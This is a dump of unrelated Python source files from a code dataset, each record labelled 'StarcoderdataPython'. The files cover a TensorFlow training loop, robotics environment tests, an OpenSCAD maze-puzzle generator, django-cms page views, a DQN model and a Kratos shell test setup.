# call a function in the model definition to do some extra work
if hasattr(model, 'update_each_step'):
model.update_each_step(sess, step)
if FLAGS.EWC == "stat":
grads2_accu_op = grads2_accu
if step == (FLAGS.max_steps - 1):
sessout = sess.run([grads2_accu_op, accu_ops])
grads2_accu=sessout[0]
else:
if FLAGS.profile:
run_options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE)
run_metadata = tf.RunMetadata()
sess.run(accu_ops, options=run_options, run_metadata=run_metadata)
tl = timeline.Timeline(run_metadata.step_stats)
ctf = tl.generate_chrome_trace_format()
with open(os.path.join(FLAGS.train_dir, 'timeline.json'), 'w') as f:
f.write(ctf)
print("generated a time line profile for one session")
else:
sess.run(accu_ops)
grads2_count += 1
if step == (FLAGS.max_steps - 1):
# save the fisher infomation matirx
for key in grads2_accu.keys():
grads2_accu[key] /= grads2_count
fname = os.path.join(FLAGS.train_dir, "EWC_stat.pkl")
pickle.dump(grads2_accu, open(fname, "wb"))
# save the MAP file
vard_v = sess.run(vard)
fname = os.path.join(FLAGS.train_dir, "EWC_map.pkl")
pickle.dump(vard_v, open(fname, "wb"))
if (step + 1) % FLAGS.display_loss == 0:
print ("processed ", step-step_start, " examples")
continue
has_run_meta = False
if FLAGS.profile:
run_options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE)
run_metadata = tf.RunMetadata()
start_time_compute = time.time()
_, loss_value = sess.run([train_op, loss], options=run_options, run_metadata=run_metadata)
duration_compute = duration_compute + time.time() - start_time_compute
# Create the Timeline object, and write it to a json
tl = timeline.Timeline(run_metadata.step_stats)
ctf = tl.generate_chrome_trace_format()
with open(os.path.join(FLAGS.train_dir, 'timeline.json'), 'w') as f:
f.write(ctf)
print("generated a time line profile for one session")
else:
start_time_compute = time.time()
if (step + 1) % (FLAGS.display_summary * 10) == 0:
has_run_meta = True
# profile in a longer interval
run_options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE)
run_metadata = tf.RunMetadata()
_, loss_value, summary_str = \
sess.run([train_op, loss, summary_op],
options=run_options,
run_metadata=run_metadata)
summary_writer.add_run_metadata(run_metadata, 'step%d' % step)
summary_writer.add_summary(summary_str, step)
print('Adding run metadata for', step)
# Create the Timeline object, and write it to a json
tl = timeline.Timeline(run_metadata.step_stats)
ctf = tl.generate_chrome_trace_format()
with open(os.path.join(FLAGS.train_dir, 'timeline.json'), 'w') as f:
f.write(ctf)
print("generated a time line profile for one session")
else:
_, loss_value = sess.run([train_op, loss])
duration_compute = duration_compute + time.time() - start_time_compute
assert not np.isnan(loss_value), 'Model diverged with loss = NaN'
if (step+1) % FLAGS.display_loss == 0:
duration = (time.time() - start_time) / FLAGS.display_loss
duration_compute = duration_compute / FLAGS.display_loss
examples_per_sec = FLAGS.batch_size / float(duration)
format_str = ('%s: step %d, loss = %.2f (%.1f examples/sec; %.3f '
'sec/batch; compute %.1f examples/sec)')
print(format_str % (datetime.now(), step, loss_value,
examples_per_sec, duration,
FLAGS.batch_size/duration_compute))
duration_compute=0
start_time = time.time()
if (step+1) % FLAGS.display_summary == 0 and not has_run_meta:
summary_str = sess.run(summary_op)
summary_writer.add_summary(summary_str, step)
# Save the model checkpoint periodically.
if step % FLAGS.checkpoint_interval == 0 or (step + 1) == FLAGS.max_steps:
checkpoint_path = os.path.join(FLAGS.train_dir, 'model.ckpt')
saver.save(sess, checkpoint_path, global_step=global_step)
except KeyboardInterrupt:
print("Control C pressed. Saving model before exit. ")
checkpoint_path = os.path.join(FLAGS.train_dir, 'model.ckpt')
saver.save(sess, checkpoint_path, global_step=global_step)
sys.exit()
def main(_):
print(tf)
# fix the profile lib not found issue
if "LD_LIBRARY_PATH" not in os.environ:
os.environ["LD_LIBRARY_PATH"] = ""
os.environ["LD_LIBRARY_PATH"] += os.pathsep + "/usr/local/cuda/extras/CUPTI/lib64"
if FLAGS.pretrained_model_checkpoint_path != "":
print("resume training from saved model: % s" % FLAGS.pretrained_model_checkpoint_path)
elif tf.gfile.Exists(FLAGS.train_dir):
# find the largest step number: -??
max_step = -1
for f in os.listdir(FLAGS.train_dir):
m = re.search('^model.ckpt-([\d]+)$', f)
if m:
found = int(m.group(1))
if found > max_step:
max_step = found
if max_step >= 0:
ckpt = os.path.join(FLAGS.train_dir, 'model.ckpt-%d' % max_step)
FLAGS.pretrained_model_checkpoint_path = ckpt
print("resume training from saved model: % s" % ckpt)
else:
tf.gfile.MakeDirs(FLAGS.train_dir)
train()
if __name__ == '__main__':
tf.app.run()
| StarcoderdataPython |
48142 | from cmx import doc
import gym
import numpy as np
from env_wrappers.flat_env import FlatGoalEnv
from sawyer.misc import space2dict, obs2dict
def test_start():
doc @ """
# Sawyer Blocks Environment
## To-do
- [ ] automatically generate the environment table
We include the following domains in this test:
"""
doc.csv @ """
Name, goal_keys, Action Space, Observation Space
Reach-v0, "hand"
Push-v0, "obj_0"
PushMove-v0, "hand", "obj_0"
"""
def test_reach_reward():
doc @ """
## sawyer:Reach-v0
"""
with doc:
env = gym.make("sawyer:Reach-v0")
env.seed(100)
frames = []
obs = env.reset()
for step in range(100):
# gripper dimension does not matter
act = env.goal['hand'] - obs['hand']
obs, r, done, info = env.step(np.array([*act, 0]) * 10)
img = env.render('rgb')
frames.append(img)
if done:
break
else:
raise RuntimeError("Reach failed to terminate")
doc.video(frames, f"videos/reach.gif")
doc.flush()
def test_reach_flat_goal():
doc @ """
### Using FlatGoalEnv Wrapper
"""
with doc:
env = gym.make("sawyer:Reach-v0")
env.seed(100)
env = FlatGoalEnv(env)
obs = env.reset()
with doc("Make sure that the spec agrees with what it returns"):
doc.yaml(space2dict(env.observation_space))
with doc:
doc.yaml(obs2dict(obs))
def test_push():
doc @ """
## sawyer:Push-v0
"""
with doc:
env = gym.make("sawyer:Push-v0")
env.seed(100)
obs = env.reset()
with doc("Make sure that the spec agrees with what it returns"):
doc.yaml(space2dict(env.observation_space))
with doc:
doc.yaml(obs2dict(obs))
def test_push_flat_goal():
doc @ """
### with FlatGoalEnv Wrapper
"""
with doc:
env = gym.make("sawyer:Push-v0")
env.seed(100)
env = FlatGoalEnv(env, )
obs = env.reset()
with doc("Make sure that the spec agrees with what it returns"):
doc.yaml(space2dict(env.observation_space))
with doc:
doc.yaml(obs2dict(obs))
def test_push_move():
doc @ """
## sawyer:PushMove-v0 Domain
This is different from the push domain by the
additional goal key that specifies the final
position for the hand.
"""
with doc:
env = gym.make("sawyer:PushMove-v0")
env.seed(100)
env = FlatGoalEnv(env, )
obs = env.reset()
with doc("Make sure that the spec agrees with what it returns"):
doc.yaml(space2dict(env.observation_space))
with doc:
doc.yaml(obs2dict(obs))
def test_pick_place():
doc @ """
## sawyer:PickPlace-v0 Domain
"""
with doc:
env = gym.make("sawyer:PickPlace-v0")
env.seed(100)
env = FlatGoalEnv(env, )
obs = env.reset()
with doc("Make sure that the spec agrees with what it returns"):
doc.yaml(space2dict(env.observation_space))
with doc:
doc.yaml(obs2dict(obs))
def test_pick_place_reward():
doc @ """
## sawyer:PickPlace-v0
We set the goal_key to ['hand',] (the same as the reaching
task) to test the termination.
"""
with doc:
env = gym.make("sawyer:PickPlace-v0", goal_keys=["hand"])
env.seed(100)
frames = []
obs = env.reset()
for step in range(100):
act = env.goal['hand'] - obs['hand']
obs, r, done, info = env.step(np.array([*act, 0]) * 10)
img = env.render('rgb')
frames.append(img)
if done:
break
else:
# raise RuntimeError("Reach failed to terminate")
print('failed')
pass
doc.video(frames, f"videos/pick_place.gif")
doc.flush()
def test_block_distribution():
doc @ """
Show the distribution of the block after initialization
"""
with doc:
env = gym.make("sawyer:PickPlace-v0", width=240, height=160)
env.seed(100)
frames = []
for step in range(20):
obs = env.reset()
frames.append(env.render('rgb'))
doc.image(np.min(frames, axis=0))
doc.flush()
# def test_fetch():
# with doc:
# import gym
# env = gym.make("FetchReach-v1")
#
# assert env.compute_reward is not None
| StarcoderdataPython |
5040339 | import os
import matplotlib
from data import PartNetDataset
from vis_utils import draw_partnet_objects
if __name__ =='__main__':
matplotlib.pyplot.ion()
# visualize one data
obj = PartNetDataset.load_object('/home/zhangxc/tmp/structurenet-master/data/results/pc_ae_chair_image_encoder_test/object-result.json')
# edge visu: ADJ (red), ROT_SYM (yellow), TRANS_SYM (purple), REF_SYM (black)
draw_partnet_objects(objects=[obj], object_names=['fig.json'],
figsize=(9, 5), leafs_only=True, visu_edges=True,
sem_colors_filename='../stats/semantics_colors/Chair.txt')
print('PartNet Hierarchy: (the number in bracket corresponds to PartNet part_id)')
print(obj) | StarcoderdataPython |
372999 | <filename>code/python/src/slub_docsa/data/preprocess/__init__.py<gh_stars>10-100
"""Data pre-processing methods."""
| StarcoderdataPython |
318817 | from collections import namedtuple
Program = namedtuple("Program", ["structs", "funcs", "meta"])
Func = namedtuple("Func", ["name", "params", "insts"])
Struct = namedtuple("Struct", ["name", "ty"])
Name = namedtuple("Name", ["str", "ty"])
BinaryInst = namedtuple("BinaryInst", ["name", "l", "op", "r"])
BinaryOps = ["+", "-", "*", "/"]
ReturnInst = namedtuple("ReturnInst", ["name"])
CallInst = namedtuple("CallInst", ["name", "func_name", "args"])
VarInst = namedtuple("VarInst", ["name", "r"])
AssignInst = namedtuple("AssignInst", ["l", "r"])
NewArrayInst = namedtuple("NewArrayInst", ["name", "elements"])
ArrayGetInst = namedtuple("ArrayGetInst", ["name", "arr", "index"])
ArraySetInst = namedtuple("ArraySetInst", ["arr", "index", "r"])
NewStructInst = namedtuple("NewStructInst", ["name", "values"])
StructGetInst = namedtuple("StructGetInst", ["name", "struct", "index"])
StructSetInst = namedtuple("StructSetInst", ["struct", "index", "r"])
FloatingType = namedtuple("FloatingType", ["name"])
FloatingType.__str__ = lambda self: self.name
FloatType = FloatingType("Float")
ArrayType = namedtuple("ArrayType", ["element", "length"])
ArrayType.__str__ = lambda self: "[{}]".format(self.element)
StructType = namedtuple("StructType", ["name", "properties"])
StructType.__str__ = lambda self: self.name.str
class StructValue:
def __init__(self, name, values):
self.name = name
self.values = values
def __repr__(self):
return f"StructValue({self.name}, {self.values})"
def __getitem__(self, index):
return self.values[index]
def __setitem__(self, index, value):
self.values[index] = value
def initial_values(params):
count = 0
def loop(ty):
nonlocal count
if isinstance(ty, FloatingType):
value = float(count)
count += 1
return value
elif isinstance(ty, ArrayType):
value = []
for _ in range(ty.length):
value.append(loop(ty.element))
return value
elif isinstance(ty, StructType):
props = []
for prop in ty.properties:
props.append(loop(prop))
return StructValue(ty.name, props)
else:
raise Exception("Unknown type: {}".format(ty))
return [loop(p.ty) for p in params]
| StarcoderdataPython |
122261 | <filename>main.py<gh_stars>0
#!/usr/bin/env python
# If you keep OpenSCAD in an unusual location, uncomment the following line of code and
# set it to the full path to the openscad executable.
# Note: Windows/python now support forward-slash characters in paths, so please use
# those instead of backslashes which create a lot of confusion in code strings.
# OPENSCAD_PATH = "C:/Program Files/OpenSCAD/openscad"
# do not edit below unless you know what you are doing!
import os
import configparser
import platform
from shutil import copy, rmtree
import shlex
import random as rd
import time
import numpy as np
import math
import re
from PIL import Image
import subprocess as sp
halt = -1 # debug: terminate skipping this shell (0 to n to enable)
# Make sure we have a fresh random seed
rd.seed()
USE_SCAD_THREAD_TRAVERSAL = False
STL_DIR = "stl_files"
PREV_DIR = "prev"
def openscad():
try:
if OPENSCAD_PATH:
return OPENSCAD_PATH
except NameError:
pass
if os.getenv("OPENSCAD_PATH"):
return os.getenv("OPENSCAD_PATH")
if platform.system() == "Darwin":
return "/Applications/OpenSCAD.app/Contents/MacOS/OpenSCAD"
if platform.system() == "Windows":
# Note: Windows allows forward slashes now
return '"C:/Program Files/OpenSCAD/openscad"'
# Default to linux-friendly CLI program name
return "openscad"
def prepwd():
# Linux and other systems that use PATH variables don't need an absolute path configured.
# if os.path.exists(openscad_exe) == False:
# input("ERROR: openscad path not found.")
# exit()
if os.path.exists(STL_DIR):
rmtree(STL_DIR)
os.mkdir(STL_DIR) # Default perms: world-writable
if os.path.exists(PREV_DIR):
rmtree(PREV_DIR)
os.mkdir(PREV_DIR) # Default perms: world-writable
def has_scad_threading():
cmd = [openscad(), "--help"]
# Note: help comes on stderr
out = sp.check_output(cmd, stderr=sp.STDOUT, universal_newlines=True)
m = re.search(r"enable experimental features:\s(.+?)\n\s*\n", out, flags=re.DOTALL)
if m:
return "thread-traversal" in re.split(r"\s*\|\s*", m[1])
return False
def scad_version():
cmd = [openscad(), "--version"]
# Note: version comes on stderr
out = sp.check_output(cmd, stderr=sp.STDOUT, universal_newlines=True)
m = re.search(r"enable experimental features:\s(.+?)\n\s*\n", out, flags=re.DOTALL)
m = re.match(r"^\s*OpenSCAD version (\d{4})\.(\d\d)\.(\d\d)\s*$", out)
return (int(m[1]), int(m[2]), int(m[3])) if m else ()
def execscad(threadid=0):
print("Executing OpenSCAD script...")
cmd = [openscad()]
if USE_SCAD_THREAD_TRAVERSAL:
cmd.append("--enable=thread-traversal")
cmd.extend(
[
"-o",
os.path.join(os.getcwd(), STL_DIR, str(shell + 1) + ".stl"),
os.path.join(os.getcwd(), "make_shells.scad"),
]
)
print(cmd)
sp.run(cmd)
def udnbers(n, vi, nc, mw, mh, stag):
for y in range(0, mh):
for x in range(0, mw):
x3 = int((x + stag[y]) % mw)
x2 = [x - 1, x + 1, x, x]
y2 = [y, y, y - 1, y + 1]
for i in range(0, 4):
if stag[y] % mw > 0:
x2[i] = int((x2[i] + mw) % mw)
else:
if x2[i] < 0:
x2[i] = 0
if x2[i] > mw - 1:
x2[i] = mw - 1
if (
not ((x3 == 0 and i == 0) or (x3 == mh - 1 and i == 1))
and y2[i] > -1
and y2[i] < mh
):
n[x, y, i] = vi[int(x2[i]), int(y2[i])] == 0
else:
n[x, y, i] = 0
nc[x, y] = len(np.argwhere(n[x, y].astype("int")))
def genmaze(mw, mh, stag, st, ex):
im = Image.new("L", [2 * mw + 1, 2 * mh + 1], 0)
visited = np.zeros(mw * mh)
nbercount = np.zeros(mw * mh)
nbers = np.ones(mw * mh * 4)
walls = np.ones(mw * mh * 4)
r = int((mw * mh) / 2)
vcount = 1
visited[r] = 1
visited = visited.reshape([mw, mh])
nbers = nbers.reshape([mw, mh, 4])
nbercount = nbercount.reshape([mw, mh])
walls = walls.reshape([mw, mh, 4])
udnbers(nbers, visited, nbercount, mw, mh, stag)
while vcount < (mw * mh):
v = np.transpose(np.nonzero(np.logical_and(visited == 1, nbercount > 0)))
# choose branch
r = rd.randint(0, len(v) - 1)
c = v[r]
# choose wall to break
if nbers[c[0], c[1]][0] == 1 or nbers[c[0], c[1]][1] == 1:
# horizontal bias when possible
r = rd.randint(0, nbercount[c[0], c[1]] - 1 + hbias)
if r > nbercount[c[0], c[1]] - 1:
r = int(r - (nbercount[c[0], c[1]]))
if nbers[c[0], c[1]][0] == 1 and nbers[c[0], c[1]][1] == 1:
r = int(r % 2)
else:
r = 0
else:
# otherwise just vertical
r = rd.randint(0, nbercount[c[0], c[1]] - 1)
n = np.argwhere(nbers[c[0], c[1]])[r]
# break wall
walls[c[0], c[1], n] = 0
c2 = c
# walls: 0=L 1=R 2=U 3=D
if n == 0:
n2 = 1
c2[0] = c[0] - 1
elif n == 1:
n2 = 0
c2[0] = c[0] + 1
elif n == 2:
n2 = 3
c2[1] = c[1] - 1
else:
n2 = 2
c2[1] = c[1] + 1
c2[0] = int((c2[0] + mw) % mw)
visited[c2[0], c2[1]] = 1
walls[c2[0], c2[1], n2] = 0
udnbers(nbers, visited, nbercount, mw, mh, stag)
vcount = vcount + 1
# preview
if ((i == 0 and shell < shells - 1) or (i == 1 and shell > 0)) and tpp != 1:
im.putpixel((1 + ex * 2, 0), 255)
im.putpixel((1 + st * 2, mh * 2), 255)
for y in range(0, mh):
for x in range(0, mw):
imx = 1 + x * 2
imy = 1 + y * 2
imnx = [imx - 1, imx + 1, imx, imx]
imny = [imy, imy, imy - 1, imy + 1]
if visited[x, y] == 1:
im.putpixel((imx, imy), 255)
for idx in range(0, 4):
if walls[x, y, idx] == 0:
im.putpixel((imnx[idx], imny[idx]), 255)
if tpp == 2:
im.save(os.path.join(os.getcwd(), PREV_DIR, str(shell + 1) + "a.png"))
else:
im.save(os.path.join(os.getcwd(), PREV_DIR, str(shell + 1) + ".png"))
return walls
def gen():
global shell
global d2
global mh
global mw
global i
global tpp
if shell < shells:
if shell == halt:
exit()
if shell + 1 > 0 and shell + 1 < shells and shell + 1 == tp and tpp < 1:
tpp = -1
if tpp < 1:
print("part: " + str(shell + 1))
wt = mwt
if tpp < 1:
if shell == 0:
d = (mw * us * p) / np.pi + wt - marge * 2
else:
if shell == tp:
d = d2
else:
d = d2 + us + wt + marge * 2
if i == 0:
mw = int(math.ceil((d / p + us) * np.pi / 2 / us))
if shell == (shells - 2):
mh += 1
else:
if shell == (shells - 1):
mw = int(math.ceil((d / p + us) * np.pi / 2 / us))
else:
mw = int(math.ceil((d2 / p + us) * np.pi / 2 / us))
mh += 1
else:
d = d2 + us + wt + marge * 2
mw = int(math.ceil((d / p + us) * np.pi / 2 / us))
mh += 1
# stag/shift
stag = np.zeros(mh)
if stagmode in (1, 2):
for y in range(0, mh):
if y == 0 or stagmode == 1:
stag[y] = rd.randint(0, mh - 1)
else:
stag[y] = stag[y - 1] + rd.randint(0, mh - 1)
elif stagmode == 3:
stag = np.multiply(np.arange(0, mh), stagconst).astype("int")
# maze
st = rd.randint(0, mw - 1)
ex = rd.randint(0, mw - 1)
marr = genmaze(int(mw), int(mh), stag, st, ex)
matrix = []
for y in range(0, mh):
row = []
for x in range(0, mw * p):
x2 = x % mw
r = marr[x2, y, 1] == 0
u = marr[x2, y, 3] == 0
if u and r:
row.append("3")
elif u:
row.append("2")
elif r:
row.append("1")
else:
row.append("0")
matrix.append(f"[{','.join(row)}]")
s = f"[{','.join(matrix)}];"
if tpp < 1:
maze_num = 1
open_mode = "w"
else:
maze_num = 2
open_mode = "a+"
with open("maze.scad", open_mode) as maze:
maze.write(f"maze{maze_num}=")
maze.write(
"\n".join(
[
s,
f"h{maze_num}={mh};",
f"w{maze_num}={mw * p};",
f"st{maze_num}={st};",
f"ex{maze_num}={ex};",
]
)
)
base = 1
lid = 0
if shell == shells - 1:
lid = 1
base = 0
if shell > shells - 2:
mos = 0
else:
mos = shells - shell - 2
with open("config.scad", "w+") as cfg:
cfg.write(
"\n".join(
[
f"p={p};",
f"tpp={tpp};",
f"is={shell};",
f"os={mos};",
f"lid={lid};",
f"base={base};",
f"iw={wt};",
f"id={d};",
f"s={us};",
f"i={i};",
f"bd={d + wt * 2 + us * 2};",
f"m={marge};",
]
)
)
if shell < shells - 2:
d2 = d
if shell > 0 and shell < shells and shell == tp and tpp < 1:
if i == 0: # double nub transition
tpp = 1
i = 1
else: # double maze transition
tpp = 2
i = 0
else:
tpp = 0
if tpp < 1:
execscad()
shell = shell + 1
return False
else:
return True
if __name__ == "__main__":
try:
prepwd()
# get scad version:
if has_scad_threading():
USE_SCAD_THREAD_TRAVERSAL = (
input("multi-threading available. use it(y/n)?").lower() == "y"
)
version = scad_version()
if version[0] < 2015:
input("ERROR: invalid scad version. must be at least 2015.xx.xx .")
exit(1)
except FileNotFoundError:
input("ERROR: Could not find OpenSCAD: " + openscad())
exit(1)
d2 = 0
shell = 0
# make parts:
p = abs(int(input("nub count (0=2 nubs,1=3 nubs,2=4 nubs, ...):"))) + 2
tpp = 0
hbias = abs(
int(input("difficulty (hbias); 0=none >0= bias; larger= more difficult:"))
)
stagconst = 0
stagmode = int(input("shift mode (0=none 1=random 2=random change 3=twist):"))
if stagmode == 3:
stagconst = abs(int(input("twist amount:")))
config = configparser.ConfigParser()
config.read("opt.ini")
if "DEFAULT" not in config:
input("ERROR: No DEFAULT section in opt.ini")
exit(1)
config = config["DEFAULT"]
shells = config.getint("levels") + 1 # levels
marge = config.getfloat("tolerance")
i = int(config.getboolean("maze_inside"))
tp = config.getint("transition_shell")
if tp >= shells:
tp = 0
us = config.getfloat("spacing")
mh = config.getint("units_tall")
mw = config.getint("units_wide")
mwt = config.getfloat("wall_thickness")
while not gen():
continue
print("done!")
| StarcoderdataPython |
9715865 | <reponame>FidelityInternational/django-cms
# -*- coding: utf-8 -*-
from django.conf import settings
from django.contrib.auth import login as auth_login, REDIRECT_FIELD_NAME
from django.contrib.auth.views import redirect_to_login
from django.core.urlresolvers import reverse
from django.http import HttpResponseRedirect, HttpResponse
from django.utils.cache import patch_cache_control
from django.utils.http import is_safe_url, urlquote
from django.utils.timezone import now
from django.utils.translation import get_language_from_request
from django.views.decorators.http import require_POST
from cms.cache.page import get_page_cache
from cms.exceptions import LanguageError
from cms.forms.login import CMSToolbarLoginForm
from cms.models.pagemodel import TreeNode
from cms.page_rendering import _handle_no_page, render_page, render_object_structure, _render_welcome_page
from cms.toolbar.utils import get_toolbar_from_request
from cms.utils import get_current_site
from cms.utils.conf import get_cms_setting
from cms.utils.i18n import (get_fallback_languages, get_public_languages,
get_redirect_on_fallback, get_language_list,
get_default_language_for_site,
is_language_prefix_patterns_used)
from cms.utils.page import get_page_from_request
from cms.utils.page_permissions import user_can_change_page
def _clean_redirect_url(redirect_url, language):
if (redirect_url and is_language_prefix_patterns_used() and redirect_url[0] == "/"
and not redirect_url.startswith('/%s/' % language)):
# add language prefix to url
redirect_url = "/%s/%s" % (language, redirect_url.lstrip("/"))
return redirect_url
def details(request, slug):
"""
The main view of the Django-CMS! Takes a request and a slug, renders the
page.
"""
response_timestamp = now()
if get_cms_setting("PAGE_CACHE") and (
not hasattr(request, 'toolbar') or (
not request.toolbar.edit_mode_active and
not request.toolbar.show_toolbar and
not request.user.is_authenticated()
)
):
cache_content = get_page_cache(request)
if cache_content is not None:
content, headers, expires_datetime = cache_content
response = HttpResponse(content)
response.xframe_options_exempt = True
response._headers = headers
# Recalculate the max-age header for this cached response
max_age = int(
(expires_datetime - response_timestamp).total_seconds() + 0.5)
patch_cache_control(response, max_age=max_age)
return response
# Get a Page model object from the request
site = get_current_site()
page = get_page_from_request(request, use_path=slug)
toolbar = get_toolbar_from_request(request)
tree_nodes = TreeNode.objects.get_for_site(site)
if not page and not slug and not tree_nodes.exists():
# render the welcome page if the requested path is root "/"
# and there's no pages
return _render_welcome_page(request)
if not page:
# raise 404
_handle_no_page(request)
request.current_page = page
if hasattr(request, 'user') and request.user.is_staff:
user_languages = get_language_list(site_id=site.pk)
else:
user_languages = get_public_languages(site_id=site.pk)
request_language = get_language_from_request(request, check_path=True)
if not page.is_home and request_language not in user_languages:
# The homepage is treated differently because
# when a request goes to the root of the site (/)
# without a language, Django will redirect to the user's
# browser language which might not be a valid cms language,
# this means we need to correctly redirect that request.
return _handle_no_page(request)
# get_published_languages will return all languages in draft mode
# and published only in live mode.
# These languages are then filtered out by the user allowed languages
available_languages = [
language for language in user_languages
if language in list(page.get_published_languages())
]
own_urls = [
request.build_absolute_uri(request.path),
'/%s' % request.path,
request.path,
]
try:
redirect_on_fallback = get_redirect_on_fallback(request_language, site_id=site.pk)
except LanguageError:
redirect_on_fallback = False
if request_language not in user_languages:
# Language is not allowed
# Use the default site language
default_language = get_default_language_for_site(site.pk)
fallbacks = get_fallback_languages(default_language, site_id=site.pk)
fallbacks = [default_language] + fallbacks
else:
fallbacks = get_fallback_languages(request_language, site_id=site.pk)
# Only fallback to languages the user is allowed to see
fallback_languages = [
language for language in fallbacks
if language != request_language and language in available_languages
]
language_is_unavailable = request_language not in available_languages
if language_is_unavailable and not fallback_languages:
# There is no page with the requested language
# and there's no configured fallbacks
return _handle_no_page(request)
elif language_is_unavailable and (redirect_on_fallback or page.is_home):
# There is no page with the requested language and
# the user has explicitly requested to redirect on fallbacks,
# so redirect to the first configured / available fallback language
fallback = fallback_languages[0]
redirect_url = page.get_absolute_url(fallback, fallback=False)
else:
page_path = page.get_absolute_url(request_language)
page_slug = page.get_path(request_language) or page.get_slug(request_language)
if slug and slug != page_slug and request.path[:len(page_path)] != page_path:
# The current language does not match its slug.
# Redirect to the current language.
return HttpResponseRedirect(page_path)
# Check if the page has a redirect url defined for this language.
redirect_url = page.get_redirect(request_language, fallback=False) or ''
redirect_url = _clean_redirect_url(redirect_url, request_language)
if redirect_url:
if request.user.is_staff and toolbar.edit_mode_active:
toolbar.redirect_url = redirect_url
elif redirect_url not in own_urls:
# prevent redirect to self
return HttpResponseRedirect(redirect_url)
# permission checks
if page.login_required and not request.user.is_authenticated():
return redirect_to_login(urlquote(request.get_full_path()), settings.LOGIN_URL)
if hasattr(request, 'toolbar'):
request.toolbar.set_object(page)
structure_requested = get_cms_setting('CMS_TOOLBAR_URL__BUILD') in request.GET
if user_can_change_page(request.user, page) and structure_requested:
return render_object_structure(request, page)
return render_page(request, page, current_language=request_language, slug=slug)
@require_POST
def login(request):
redirect_to = request.GET.get(REDIRECT_FIELD_NAME)
if not is_safe_url(url=redirect_to, host=request.get_host()):
redirect_to = reverse("pages-root")
if request.user.is_authenticated():
return HttpResponseRedirect(redirect_to)
form = CMSToolbarLoginForm(request=request, data=request.POST)
if form.is_valid():
auth_login(request, form.user_cache)
else:
redirect_to += u'?cms_toolbar_login_error=1'
return HttpResponseRedirect(redirect_to)
| StarcoderdataPython |
350243 | <filename>game/rl/dqn/model.py<gh_stars>0
import os
from os import path
import numpy as np
import torch
import torch.nn as nn
from torch.optim import Adam
from pathlib import Path
from dataclasses import asdict
from utils.math_utils import to_numpy
from .network import DQN
from .configs.model import ModelConfig
from .utils.experience import Experience
from .utils.replay_memory import ReplayMemory
class Model:
def __init__(self, config: ModelConfig) -> None:
self.config = config
self.memory = ReplayMemory(config.memory)
self.policy_net = DQN(config.dqn).to(config.device)
self.target_net = DQN(config.dqn).to(config.device)
self.criterion = nn.SmoothL1Loss()
self.optimizer = Adam(self.policy_net.parameters(), lr=config.lr)
self.step: int = 0
self.history: list[float] = []
self.load_checkpoint(update_target_net=True)
self.target_net.eval()
def evaluate(self, state: np.ndarray) -> np.ndarray:
state = torch.tensor(state[np.newaxis, :], device=self.config.device)
with torch.no_grad():
values = self.policy_net(state)[0]
return to_numpy(values)
def __get_train_batch(self) -> dict[str, torch.Tensor]:
samples = self.memory.sample(self.config.batch_size)
batch = {
key: torch.tensor(
np.array(
[getattr(sample, key) for sample in samples],
),
device=self.config.device,
)
for key in asdict(samples[0])
}
return batch
def train(self, experience: Experience) -> None:
self.memory.push(experience)
config = self.config
if len(self.memory) >= config.train_start:
batch = self.__get_train_batch()
self.step += 1
self.optimizer.zero_grad()
action_idxs = batch["action"].view(-1, 1)
values = self.policy_net(batch["state"]).gather(1, action_idxs)
next_values = torch.zeros(config.batch_size, device=config.device)
terminal = batch["terminal"]
non_terminal = batch["next_state"][~terminal]
next_values[~terminal] = (
self.target_net(non_terminal).max(dim=1)[0].detach()
)
expected_values = next_values * config.gamma + batch["reward"]
loss = self.criterion(values, expected_values.unsqueeze(1))
loss.backward()
self.optimizer.step()
self.history.append(loss.item())
if self.step % config.update_step == 0:
self.__update_target_net()
if self.step % config.print_every == 0:
print("Step:", self.step, "Loss:", loss.item())
def __update_target_net(self) -> None:
self.target_net.load_state_dict(self.policy_net.state_dict())
def save_checkpoint(self) -> None:
state_dict = {
name: getattr(self, name).state_dict()
for name in ["policy_net", "target_net", "optimizer"]
}
state_dict["step"] = self.step
torch.save(state_dict, self.config.model_path)
def load_checkpoint(self, update_target_net: bool = False) -> None:
config = self.config
if path.exists(config.model_path):
checkpoint = torch.load(
config.model_path, map_location=config.device
)
for name in ["policy_net", "target_net", "optimizer"]:
getattr(self, name).load_state_dict(checkpoint[name])
self.step = checkpoint["step"]
else:
if update_target_net:
self.__update_target_net()
| StarcoderdataPython |
9790978 | <gh_stars>0
import KratosMultiphysics
import KratosMultiphysics.StructuralMechanicsApplication as StructuralMechanicsApplication
import KratosMultiphysics.KratosUnittest as KratosUnittest
class TestPatchTestShells(KratosUnittest.TestCase):
def setUp(self):
pass
def _add_variables(self,mp):
mp.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
mp.AddNodalSolutionStepVariable(KratosMultiphysics.ROTATION)
mp.AddNodalSolutionStepVariable(KratosMultiphysics.REACTION)
mp.AddNodalSolutionStepVariable(KratosMultiphysics.REACTION_MOMENT)
mp.AddNodalSolutionStepVariable(KratosMultiphysics.VOLUME_ACCELERATION)
mp.AddNodalSolutionStepVariable(StructuralMechanicsApplication.POINT_LOAD)
def _add_dofs(self,mp):
# Adding the dofs AND their corresponding reaction!
KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.DISPLACEMENT_X, KratosMultiphysics.REACTION_X,mp)
KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.DISPLACEMENT_Y, KratosMultiphysics.REACTION_Y,mp)
KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.DISPLACEMENT_Z, KratosMultiphysics.REACTION_Z,mp)
KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.ROTATION_X, KratosMultiphysics.REACTION_MOMENT_X,mp)
KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.ROTATION_Y, KratosMultiphysics.REACTION_MOMENT_Y,mp)
KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.ROTATION_Z, KratosMultiphysics.REACTION_MOMENT_Z,mp)
def _create_nodes(self,mp,element_name):
mp.CreateNewNode(1, -0.5, - 0.45, 0.1)
mp.CreateNewNode(2, 0.7, -0.5, 0.2)
mp.CreateNewNode(3, 0.55, 0.6, 0.15)
mp.CreateNewNode(4, -0.48, 0.65, 0.0)
mp.CreateNewNode(5, 0.02, -0.01, -0.15)
if element_name.endswith("4N"): # create aditional nodes needed for quad-setup
mp.CreateNewNode(6, -0.03, -0.5, 0.0)
mp.CreateNewNode(7, 0.51, 0.02, 0.03)
